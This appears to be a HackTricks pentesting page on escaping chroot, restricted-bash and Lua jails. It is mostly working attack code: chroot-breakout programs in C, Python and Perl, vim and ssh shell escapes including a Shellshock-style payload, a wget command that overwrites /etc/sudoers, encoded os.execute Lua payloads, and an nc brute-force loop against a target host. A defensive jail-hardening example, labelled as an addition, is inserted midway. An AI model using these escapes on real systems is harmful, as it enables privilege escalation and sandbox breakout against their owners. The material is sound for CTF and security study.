HackTricks
Escaping from Jails

GTFOBins

Check https://gtfobins.github.io/ for every binary you are able to execute: any entry with the "Shell" property can be used to spawn a shell.

Chroot limitation

From wikipedia: The chroot mechanism is not intended to defend against intentional tampering by privileged (root) users. On most systems, chroot contexts do not stack properly and chrooted programs with sufficient privileges may perform a second chroot to break out.
Therefore, if you are root inside a chroot you can escape by creating another chroot. However, in many cases the chroot command itself is not available inside the first chroot, so you will need to compile a binary like the following one and run it:
break_chroot.c
```c
#include <sys/stat.h>
#include <stdlib.h>
#include <unistd.h>

// gcc break_chroot.c -o break_chroot

int main(void)
{
    // Create a directory inside the jail and chroot into it: the kernel only
    // records the new root, so the current working directory is now outside it.
    mkdir("chroot-dir", 0755);
    chroot("chroot-dir");
    // Walk upwards; with the cwd outside the root, ".." is not clamped,
    // so enough steps reach the real filesystem root.
    for (int i = 0; i < 1000; i++) {
        chdir("..");
    }
    // Make the real root the process root again and spawn a shell there.
    chroot(".");
    system("/bin/bash");
    return 0;
}
```
Using python:
```python
#!/usr/bin/python
import os

# Same technique as the C version: chroot into a subdirectory, walk up
# with chdir("..") until the real root is reached, then chroot there.
os.mkdir("chroot-dir")
os.chroot("chroot-dir")
for i in range(1000):
    os.chdir("..")
os.chroot(".")
os.system("/bin/bash")
```
Using perl:
```perl
#!/usr/bin/perl
# Same technique as the C version, written in Perl.
mkdir "chroot-dir";
chroot "chroot-dir";
foreach my $i (0..1000) {
    chdir "..";
}
chroot ".";
system("/bin/bash");
```
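The defensive counterpart, as an added example that is not part of the original page: a jailer that chroots and then drops root irreversibly, so that the second chroot() the escape above relies on fails with EPERM. The jail directory "./jail" and the uid/gid 65534 are assumptions.

```c
#include <errno.h>
#include <grp.h>
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>

/* Drop root for good: clear supplementary groups, set the gid before the
 * uid, then prove the drop stuck by checking that regaining uid 0 fails. */
int drop_privileges(uid_t uid, gid_t gid)
{
    if (geteuid() == 0 && setgroups(0, NULL) != 0) return -1;
    if (setgid(gid) != 0) return -1;
    if (setuid(uid) != 0) return -1;
    if (setuid(0) == 0) return -1;   /* still root: the drop did not work */
    return 0;
}

/* Probe whether the caller could still chroot(): 1 = yes (an escape like
 * break_chroot.c would work), 0 = EPERM (CAP_SYS_CHROOT is gone), -1 = other
 * error. Only meaningful after drop_privileges(); as root it would actually
 * re-root the process to its cwd. */
int can_rechroot(void)
{
    if (chroot(".") == 0) return 1;
    return (errno == EPERM) ? 0 : -1;
}

/* Enter the jail: chroot, move the cwd inside the new root (a cwd left
 * outside is itself the escape hatch), then drop root so chroot() cannot
 * be repeated by anything that runs afterwards. */
int enter_jail(const char *dir, uid_t uid, gid_t gid)
{
    if (chroot(dir) != 0) return -1;
    if (chdir("/") != 0) return -1;
    return drop_privileges(uid, gid);
}

int main(void)
{
    /* Assumed values: jail directory "./jail", unprivileged uid/gid 65534. */
    if (enter_jail("./jail", 65534, 65534) != 0) {
        perror("enter_jail (needs root and an existing ./jail)");
        return 1;
    }
    printf("second chroot possible: %s\n", can_rechroot() ? "yes" : "no");
    return 0;
}
```

Run as root to see the jail set up and report "no"; as an unprivileged user enter_jail fails at chroot(), which is the same permission check that stops the escape.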

Bash Jails

Enumeration

Get info about the jail:
```bash
echo $SHELL
echo $PATH
env
export
pwd
```

Modify PATH

Check whether you can modify the PATH environment variable:
```bash
echo $PATH # See the path of the executables that you can use
PATH=/usr/local/sbin:/usr/sbin:/sbin:/usr/local/bin:/usr/bin:/bin # Try to change the path
echo /home/* # List a directory without an external binary
```

Using vim

```
:set shell=/bin/sh
:shell
```

Create script

Check whether you can create an executable file with /bin/bash as its content:
```bash
red /bin/bash
> w wx/path # Write /bin/bash to a writable and executable path
```

Get bash from SSH

If you are accessing via ssh you can use this trick to execute a bash shell:
```bash
ssh -t user@<IP> bash # Get an interactive shell directly
ssh user@<IP> -t "bash --noprofile -i"
ssh user@<IP> -t "() { :; }; sh -i "
```

Declare

```bash
declare -n PATH; export PATH=/bin;bash -i

BASH_CMDS[shell]=/bin/bash;shell -i
```

Wget

You can overwrite files, for example the sudoers file:
```bash
wget http://127.0.0.1:8080/sudoers -O /etc/sudoers
```

Other tricks

Python Jails

Tricks for escaping from Python jails are on the following page:

Lua Jails

This page lists the global functions you have access to inside Lua: https://www.gammon.com.au/scripts/doc.php?general=lua_base
Eval with command execution (the byte string decodes to os.execute('ls')):
```lua
load(string.char(0x6f,0x73,0x2e,0x65,0x78,0x65,0x63,0x75,0x74,0x65,0x28,0x27,0x6c,0x73,0x27,0x29))()
```
Some tricks to call functions of a library without using dots:
```lua
print(string.char(0x41, 0x42))
print(rawget(string, "char")(0x41, 0x42))
```
Enumerate the functions of a library:
```lua
for k,v in pairs(string) do print(k,v) end
```
Note that every time you execute the previous one-liner in a different Lua environment the order of the functions changes. Therefore, if you need to execute one specific function you can perform a brute-force attack by loading different Lua environments and calling the first function of the library:
```lua
-- In this scenario you could brute-force a victim that generates a new Lua
-- environment for every interaction with the following line; when you are
-- lucky the char function is the one that gets executed.
for k,chr in pairs(string) do print(chr(0x6f,0x73,0x2e,0x65,0x78)) end
```
```bash
# This attack from a CTF can be used to try to chain the function execute from the "os" library
# and "char" from the string library, and then use both to execute a command.
for i in $(seq 1 1000); do echo "for k1,chr in pairs(string) do for k2,exec in pairs(os) do print(k1,k2) print(exec(chr(0x6f,0x73,0x2e,0x65,0x78,0x65,0x63,0x75,0x74,0x65,0x28,0x27,0x6c,0x73,0x27,0x29))) break end break end" | nc 10.10.10.10 10006 | grep -A5 "Code: char"; done
```
Get an interactive Lua shell: if you are inside a limited Lua shell you can get a new (and hopefully unrestricted) Lua shell by calling:
```lua
debug.debug()
```